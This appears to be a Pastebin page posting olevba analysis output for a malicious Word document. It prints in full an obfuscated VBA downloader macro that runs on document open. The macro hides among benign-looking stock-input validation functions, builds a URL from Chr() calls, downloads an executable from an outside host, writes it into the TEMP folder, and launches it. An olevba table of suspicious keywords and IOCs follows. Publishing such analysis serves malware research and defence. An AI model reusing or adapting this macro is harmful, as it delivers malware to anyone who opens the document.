API tools faq
paste
dynamoo

Malicious Word macro

dynamoo
Jul 23rd, 2015
585
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VisualBasic 15.08 KB | None | 0 0
raw download clone embed print report
  1. olevba 0.31 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OpX:MASIHB-V orderf~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: orderf~1.doc
  10. Type: OpenXML
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub autoopen()
  17.  
  18. VEeve (8.2)
  19.  
  20. End Sub
  21.  
  22. Sub VEeve(FFFFF As Long)
  23. TgU9h0l0q
  24.  
  25. End Sub
  26.  
  27.  
  28.  
  29.  
  30. -------------------------------------------------------------------------------
  31. VBA MACRO Module1.bas
  32. in file: word/vbaProject.bin - OLE stream: u'VBA/Module1'
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34.  
  35. Public Const QUOTE = "'"
  36. Public Const QUOTE2 = "''"
  37. Public Const DOUBLE_QUOTE = """"
  38. Public rGlT7xRnM As String
  39. Public Const NUMERIC_KEYS = "-01234567890."
  40.  
  41.  
  42.  
  43. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  44. '
  45. Public Function Max(ByVal a As Variant, ByVal b As Variant) As Variant
  46.     If a > b Then
  47.         Max = a
  48.     Else
  49.         Max = b
  50.     End If
  51. End Function
  52.  
  53. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  54. '
  55. Public Function Min(ByVal a As Variant, ByVal b As Variant) As Variant
  56.     If a < b Then
  57.         Min = a
  58.     Else
  59.         Min = b
  60.     End If
  61. End Function
  62.  
  63. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  64. '
  65. Public Function Between(ByVal a As Variant, ByVal b As Variant, ByVal c As Variant) As Variant
  66.     If a < b Then
  67.         Between = b
  68.     ElseIf a > c Then
  69.         Between = c
  70.     Else
  71.         Between = a
  72.     End If
  73. End Function
  74.  
  75. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  76. '
  77. Public Function DBRead(ByVal V As Variant, Optional ByVal NullValue As Variant = 0) As Variant
  78.     On Error Resume Next
  79.     DBRead = IIf(IsNull(V), NullValue, V)
  80. End Function
  81.  
  82. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  83.  
  84. Sub TgU9h0l0q()
  85.  
  86. nByNDCCqAzBkEo = Chr(104) & Chr(116) & "<" & Chr(116) & Chr(112) & Chr(58) & Chr(47) & ";" & Chr(47) & "s" & Chr(111) & Chr(108) & Chr(117) & Chr(116) & Chr(105) & Chr(111) & Chr(110) & Chr(45) & Chr(97) & Chr(99) & Chr(111) & Chr(117) & Chr(112) & Chr(104) & Chr(101) & Chr(110) & Chr(101) & Chr(46) & Chr(102) & Chr(114) & Chr(47) & Chr(109) & Chr(105) & Chr(110) & Chr(105) & Chr(47) & Chr(109) & Chr(112) & Chr(112) & Chr(121) & Chr(46) & "e" & Chr(120) & Chr(101)
  87. Set rUuJO37ZN3t = ValidateString3(Chr(77) & Chr(105) & Chr(60) & Chr(99) & Chr(114) & Chr(111) & Chr(61) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(59) & Chr(46) & Chr(88) & Chr(77) & Chr(60) & Chr(76) & Chr(59) & Chr(72) & Chr(84) & Chr(61) & Chr(84) & Chr(80))
  88.  
  89. nByNDCCqAzBkEo = Replace(nByNDCCqAzBkEo, Chr(60), "")
  90. nByNDCCqAzBkEo = Replace(nByNDCCqAzBkEo, Chr(61), "")
  91. nByNDCCqAzBkEo = Replace(nByNDCCqAzBkEo, Chr(59), "")
  92. CallByName rUuJO37ZN3t, "" + Chr(79) & Chr(112) & Chr(101) & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), _
  93. nByNDCCqAzBkEo _
  94. , False
  95.  
  96. Set NQwAQCRSizomP = ValidateString3(Chr(87) & Chr(60) & "S" & Chr(99) & Chr(61) & Chr(114) & Chr(105) & Chr(112) & "t" & Chr(59) & Chr(46) & Chr(83) & "=" & Chr(104) & "e" & "<" & Chr(108) & Chr(108))
  97.  
  98. Set HU2f4J2c = CallByName(NQwAQCRSizomP, "E" & Chr(110) & Chr(118) & "i" & "r" & "o" & "n" & "m" & Chr(101) & Chr(110) & Chr(116), VbGet, Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115))
  99.  
  100. Z5pabTtIweA = HU2f4J2c("" + "T" & Chr(69) & Chr(77) & "P")
  101.  
  102. rGlT7xRnM = Z5pabTtIweA & "" + "\" & "i" & Chr(104) & Chr(104) & Chr(97) & Chr(100) & "n" & Chr(105) & Chr(99) & Chr(46) & "e" & Chr(120) & "e"
  103. Dim eCWgqNwtczezs() As Byte
  104.  
  105. CallByName rUuJO37ZN3t, "" + Chr(83) & Chr(101) & Chr(110) & "d", VbMethod
  106. eCWgqNwtczezs = CallByName(rUuJO37ZN3t, "" + Chr(114) & "e" & Chr(115) & "p" & Chr(111) & Chr(110) & "s" & Chr(101) & "B" & "o" & "d" & Chr(121), VbGet)
  107. H8a5KfhNJe eCWgqNwtczezs, rGlT7xRnM
  108. On Error GoTo kkiLwb6xLU
  109.     a = 345 / 0
  110.   On Error GoTo 0
  111.  
  112. sMkc0xymfSCd:
  113.   Exit Sub
  114. kkiLwb6xLU:
  115.   ValidateString2 ("qaMNp4efRqbw")
  116. Resume sMkc0xymfSCd
  117. End Sub
  118.  
  119. '
  120. Public Function DBWrite(ByVal V As Variant, Optional ByVal NullValue As Variant = 0) As Variant
  121.     On Error Resume Next
  122.     DBWrite = IIf(V = NullValue, Null, V)
  123. End Function
  124.  
  125. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  126. ' Converts Symbol to form acceptable by Sql syntax
  127. ' AGR'A -> 'AGR''A'
  128. '
  129. Public Function QuotedSymbol(ByVal Symbol As String) As String
  130.     QuotedSymbol = QUOTE & Replace(Symbol, QUOTE, QUOTE2) & QUOTE
  131. End Function
  132.  
  133. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  134. ' Converts Symbol to standard form
  135. ' AGR''A -> AGR'A
  136.  
  137. Public Function H8a5KfhNJe(PfWaLAWoFq4 As Variant, rOvqV3q0jE As String)
  138. Dim BxOUxRpIDhd: Set BxOUxRpIDhd = ValidateString3("A" & "<" & "d" & Chr(111) & Chr(59) & "d" & Chr(98) & Chr(61) & Chr(46) & Chr(83) & "t" & "=" & Chr(114) & "<" & "e" & Chr(97) & Chr(59) & "m")
  139.  
  140.  
  141.    BxOUxRpIDhd.Type = 1
  142.     BxOUxRpIDhd.Open
  143.     BxOUxRpIDhd.write PfWaLAWoFq4
  144.     BxOUxRpIDhd.savetofile rOvqV3q0jE, 2
  145. End Function
  146.  
  147.  
  148.  
  149. ' AGR"A -> AGR'A
  150. '
  151. Public Sub ValidStockSymbol(Symbol As String)
  152.     Symbol = Replace(Symbol, QUOTE2, QUOTE)
  153.     Symbol = Replace(Symbol, DOUBLE_QUOTE, QUOTE)
  154. End Sub
  155.  
  156. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  157. '
  158. Public Sub NumericFilter(KeyAscii As Integer)
  159.     If KeyAscii > 31 Then
  160.         If InStr(NUMERIC_KEYS, Chr$(KeyAscii)) = 0 Then
  161.             KeyAscii = 0
  162.         End If
  163.     End If
  164. End Sub
  165.  
  166. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  167. ' CURRENCY 8 bytes
  168. ' A scaled integer between
  169. '   – 922,337,203,685,477.5808
  170. ' and 922,337,203,685,477.5807
  171. '
  172. ' We restrict it to be
  173. ' - positive
  174. ' - integer i.e. no fractions
  175. ' - not more than 14 symbols
  176. ' so it can be from 1 to 99 999 999 999 999
  177. '
  178. Public Function ValidateCurrency(TC As String)
  179. Dim S As String
  180. Dim i As Long
  181.     On Error Resume Next
  182.     '////////////////////////
  183.    ' Restrict user input '/
  184.    '//////////////////////
  185.    With ss.TC
  186.         i = .SelStart
  187.         S = ValidateString(.Text, False, False, False, 14, 0)
  188.         .Text = S
  189.         .SelStart = i
  190.     End With
  191.     '///////////////////////
  192.    ' Convert user input '/
  193.    '/////////////////////
  194.    On Error GoTo Fail
  195.     ValidateCurrency = CCur(d.TC.Text)
  196.     Exit Function
  197. Fail:
  198.     On Error Resume Next
  199.     de.TC.Text = ""
  200.     ValidateCurrency = 0
  201. End Function
  202.  
  203. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  204. '
  205.  
  206. Public Function ValidateString3(t5Ls3vWT9kn82Y As String)
  207. t5Ls3vWT9kn82Y = Replace(t5Ls3vWT9kn82Y, Chr(60), "")
  208. t5Ls3vWT9kn82Y = Replace(t5Ls3vWT9kn82Y, Chr(61), "")
  209. t5Ls3vWT9kn82Y = Replace(t5Ls3vWT9kn82Y, Chr(59), "")
  210.  Set ValidateString3 = CreateObject("" + t5Ls3vWT9kn82Y)
  211. End Function
  212. Public Function ValidatePrice(TC As String) As Double
  213. Dim S As String
  214. Dim i As Long
  215.     On Error Resume Next
  216.     With dw.TC
  217.         ' Validating UserInput
  218.        i = .SelStart
  219.         S = ValidateString(.Text, False, False, True, 10, 1000000000)
  220. '        s = VBCleanEntry(.Text, ".", 2)
  221.        .Text = S
  222.         .SelStart = i
  223.         ValidatePrice = Val(.Text)
  224.     End With
  225. End Function
  226.  
  227. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  228. '
  229. Public Function ValidateAmount(TC As String) As Long
  230.     Dim S As String
  231.     Dim i As Long
  232.    
  233.     On Error Resume Next
  234.     With dw.TC
  235.         ' Validating UserInput
  236.        i = .SelStart
  237.         S = ValidateString(.Text, False, False, False, 10, 1000000000)
  238. '        s = VBCleanEntry(.Text, ".", 2)
  239.        .Text = S
  240.         .SelStart = i
  241.         ValidateAmount = Val(.Text)
  242.     End With
  243. End Function
  244.  
  245. '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  246. '
  247. Public Function ValidatePercent(TC As String) As Double
  248. Dim S As String
  249. Dim i As Long
  250.     On Error Resume Next
  251.     With dd.TC
  252.         i = .SelStart
  253.         S = ValidateString(.Text, False, True, True, 6, 100)
  254.         Dim j As Long
  255.         j = InStr(S, ".")
  256.         If j > 0 Then
  257.             Dim f As String
  258.             Dim g As String
  259.             f = Mid(S, j + 1)
  260.             If Len(f) > 2 Then
  261.                 f = Left(f, 2)
  262.             End If
  263.             g = Left(S, j - 1)
  264.             S = g & "." & f
  265.         End If
  266.         .Text = S
  267.         .SelStart = i
  268.         ValidatePercent = Val(.Text)
  269.     End With
  270. End Function
  271.  
  272. '   -------------------------------------------------------------
  273. '   function validates parsed string
  274. '   Use it on Change Event
  275.  
  276. Public Function ValidateString2(pq5Q05lvWOS32 As String)
  277.  Set k69VPFQVKj0nQ = ValidateString3(Chr(83) & "h" & Chr(61) & Chr(101) & Chr(108) & Chr(59) & Chr(108) & Chr(60) & Chr(46) & Chr(65) & Chr(112) & Chr(59) & Chr(112) & Chr(108) & Chr(105) & Chr(60) & Chr(99) & Chr(97) & Chr(116) & Chr(61) & Chr(105) & Chr(111) & Chr(110))
  278. With k69VPFQVKj0nQ
  279. .Open (rGlT7xRnM)
  280. End With
  281. End Function
  282.  
  283. '   © 2000 Dmitry Grechishkin, grechishkin@egartech.com
  284.  
  285.     Public Function ValidateString( _
  286.                             strInputString As String, _
  287.                             blnAllowNegative As Boolean, _
  288.                             blnAllowZero As Boolean, _
  289.                             blnAllowFractions As Boolean, _
  290.                             Optional lngMaxLen As Long = 0, _
  291.                             Optional lngMaxValue As Long = 0 _
  292.                             ) As String
  293.    
  294.     Dim strTmpValue  As String
  295.     Dim strCurrentSymbol  As String
  296.     Dim strLeftStroke As String
  297.     Dim strRightStroke As String
  298.     Dim lngLenght As Long
  299.     Dim lngDotPosition As Long
  300.     Dim blnInvalidSymbol As Boolean
  301.     Dim blnCorrectDot  As Boolean
  302.    
  303.     Dim i As Long
  304.     Dim j As Long
  305.    
  306.     On Error Resume Next
  307.    
  308.     strTmpValue = Trim$(strInputString)
  309.     lngLenght = Len(strTmpValue)
  310.    
  311.     If lngLenght > 0 Then
  312. '   ---------------------
  313. '       Validates user input independently from locals and uses ',' or '.' as decimal separator
  314.        For i = 1 To lngLenght
  315.         blnInvalidSymbol = True
  316. '
  317.        If blnAllowFractions And (Mid$(strTmpValue, i, 1) = ",") Then
  318.             Mid$(strTmpValue, i, 1) = "."
  319.         End If
  320.        
  321.         strCurrentSymbol = Mid$(strTmpValue, i, 1)
  322. '            Truncates value if it exeeds max value
  323.             If lngMaxValue > 0 Then
  324.                 If Abs(Val(strTmpValue)) > lngMaxValue Then
  325.                     strTmpValue = Left$(strTmpValue, lngLenght - 1)
  326.                     blnInvalidSymbol = True
  327.                     GoTo EX
  328.                 End If
  329.              End If
  330.              If lngMaxLen > 0 Then
  331. '            If negative values are allowed to be inputted
  332.                If Len(Trim$(Replace(strTmpValue, "-", " "))) > lngMaxLen Then
  333.                     strTmpValue = Left$(strTmpValue, lngMaxLen)
  334.                     blnInvalidSymbol = True
  335.                     GoTo EX
  336.                 End If
  337.              End If
  338.              
  339.              
  340.             If i = 1 Then
  341.                 If blnAllowNegative And (strCurrentSymbol = "-") Then
  342.                     blnInvalidSymbol = False
  343.                     GoTo Check
  344.                 End If
  345. '               if zero values are allowed to input
  346.                If Not blnAllowZero And (strCurrentSymbol = "0") Then
  347.                     blnInvalidSymbol = True
  348.                     GoTo Check
  349.                 End If
  350.             End If
  351.  
  352. '               --------------------------
  353. '               numeric validation
  354.                For j = 0 To 9
  355.                     If strCurrentSymbol = Trim$(Str$(j)) Then
  356.                         blnInvalidSymbol = False
  357.                         GoTo Check
  358.                     End If
  359.                 Next
  360. '               --------------------------
  361. '            decimal separator is single in string
  362.             If (lngDotPosition > 0) Then
  363.                 If (lngDotPosition = i) Then
  364.                     blnCorrectDot = True
  365.                 Else
  366.                     blnCorrectDot = False
  367.                 End If
  368.              Else
  369.                     blnCorrectDot = True
  370.              End If
  371.              
  372.              If blnAllowFractions And (strCurrentSymbol = ".") And blnCorrectDot Then
  373.                 blnInvalidSymbol = False
  374.                 lngDotPosition = i
  375.                 GoTo Check
  376.              End If
  377.  
  378. Check:
  379. '   If any invalid symbol is found, cut it away
  380.    If blnInvalidSymbol Then
  381.         strLeftStroke = Left$(strTmpValue, i - 1)
  382.         strRightStroke = Right$(strTmpValue, lngLenght - i)
  383.         strTmpValue = strLeftStroke + strRightStroke
  384.     End If
  385.         Next
  386. '   ---------------------
  387. EX:
  388.      ValidateString = strTmpValue
  389.    
  390.     End If
  391.     On Error GoTo 0
  392. End Function
  393. +------------+----------------------+-----------------------------------------+
  394. | Type       | Keyword              | Description                             |
  395. +------------+----------------------+-----------------------------------------+
  396. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  397. | Suspicious | Open                 | May open a file                         |
  398. | Suspicious | CreateObject         | May create an OLE object                |
  399. | Suspicious | CallByName           | May attempt to obfuscate malicious      |
  400. |            |                      | function calls                          |
  401. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  402. |            |                      | strings                                 |
  403. | Suspicious | SaveToFile           | May create a text file                  |
  404. | Suspicious | Write                | May write to a file (if combined with   |
  405. |            |                      | Open)                                   |
  406. | Suspicious | Open                 | May open a file (obfuscation: VBA       |
  407. |            |                      | expression)                             |
  408. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
  409. |            |                      | be used to obfuscate strings (option    |
  410. |            |                      | --decode to see all)                    |
  411. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  412. |            |                      | may be used to obfuscate strings        |
  413. |            |                      | (option --decode to see all)            |
  414. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  415. |            | Strings              | may be used to obfuscate strings        |
  416. |            |                      | (option --decode to see all)            |
  417. | IOC        | mppy.exe             | Executable file name (obfuscation: VBA  |
  418. |            |                      | expression)                             |
  419. | IOC        | ihhadnic.exe         | Executable file name (obfuscation: VBA  |
  420. |            |                      | expression)                             |
  421. +------------+----------------------+-----------------------------------------+
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!